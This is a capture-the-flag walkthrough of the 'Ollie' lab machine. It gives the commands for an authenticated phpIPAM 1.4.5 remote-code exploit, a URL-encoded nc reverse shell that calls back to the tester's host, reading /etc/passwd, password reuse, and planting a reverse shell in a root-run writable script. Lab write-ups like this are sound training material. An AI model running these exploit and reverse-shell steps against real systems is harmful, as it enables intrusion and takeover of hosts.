Ollie

Target IP: 10.10.237.226

Challenge Description:
e17a9bfb94020f07ba62bfea44351de5.png


Reconnaissance

1dd6d371b75346a745130a3951a7183c.png
Performing an nmap scan shows there are three TCP ports open on the target machine, as shown above.

02f12353a06dc470ae92d049c0e7b89d.png
Performing an aggressive nmap scan against the three open TCP ports returns the result above. I will start enumeration with the application on port 1337 first.


Enumeration

Port 1337: Application
3c4cde8fd01ddfa184811c5ac6fcbd95.png
I connected to the application on port 1337 on the target machine via nc. This application seems to provide the credentials admin:OllieUnixMontgomery! for an administration panel. The next step is to locate this administration panel.

Port 80: HTTP
5b189b104100cca48b6e5a21cb4bfe47.png
Browsing to this port displays the login webpage above. Can I use the credentials admin:OllieUnixMontgomery! here? Another interesting information is the application & version of this CMS is phpIPAM IP address management [v1.4.5].

41bb85a4132fa5ed6458137ebef09f1d.png
I know phpIAM 1.4.5 is vulnerable to authenticated RCE, as shown above. Before firing any exploits against the target machine, I wish to enumerate this machine further.

57402e5648bafa7cdf032dd597dfcd6d.png
Using the credentials admin:OllieUnixMontgomery!, I logged in successfully as shown above. I enumerated the application to find any useful files, but I did not find anything useful.


Exploitation

3a222263aa4d64176a146368da2b4696.png
I downloaded the exploit from this link, and ran it against the target machine using the command python3 exp.py -url http://10.10.237.226/ -usr admin -pwd OllieUnixMontgomery! --shell. This exploit opened a simple shell that I can use to perform RCE, as shown above. Time to elevate this to a more stable reverse shell connection.

bda2d3c90a9a0cb8ce83d6d5c5a11c4e.png
I started a listener on port 8443 on my machine. Then using the exploit's shell, I deployed the URL-encoded reverse shell script rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fbash%20-i%202%3E%261%7Cnc%2010.14.55.153%208443%20%3E%2Ftmp%2Ff to the target machine and obtained a reverse shell connection on my machine at port 8443, as shown above. Now I have a foothold on the target machine with the session as www-data.


Privilege Escalation

803e1416d47c3aad907c9470ed716c59.png
The config.php located at /var/www/html contains the credentials phpipam_ollie:IamDah1337estHackerDog! of the database application running at port 3306. However, I am unable to connect to the database application.

8db1c05ebbd8e6601eb3643b93415040.png
Running cat /etc/passwd shows there is a user called ollie. Trying to switch to this user ollie using the password IamDah1337estHackerDog! does not work; however, the password OllieUnixMontgomery! does, as shown above -- this user like to reuse their passwords. I successfully elevated my privileges from the user www-data to ollie. Time to obtain root privileges.

eaf1439ecdc9867df92de68041303730.png
Running the command find / -writable -type f 2>/dev/null shows an interesting entry called /usr/bin/feedme.

16e79a1ae4eab036c8dc651d696b02c8.png
Running ls -la /usr/bin/feedme shows the user ollie has rw permissions. Using cat, I viewed the contents of this file and obtained the result above. This script is interesting.

712c6ddeada9f9fd6b20865a91cf31b5.png
I transferred pspy64 to the target machine and ran it. I obtained the interesting result above. It looks like the script feedme gets executed as the user root. And from previous enumeration, I know I have write permission over it too; meaning, I can put my reverse shell script inside it.

1598ff66efe8a1e9ecb43a1021902132.png
In the picture above, the text highlighted in green is the reverse shell script I put inside feedme. Then I started a listener on port 8444 on my machine to catch this shell.

838bf1d82432d65810c11e353ba745d6.png
And now I have a root reverse shell connection on port 8444, as shown in the picture above in bottom terminal. Now I have root access on the target machine :)


Flags

592d202bd31777c4117900f04bd83d1e.png
The user.txt flag is shown above.

58626a3c18c91548b11c46e7f3222f6f.png
The root.txt flag is shown above.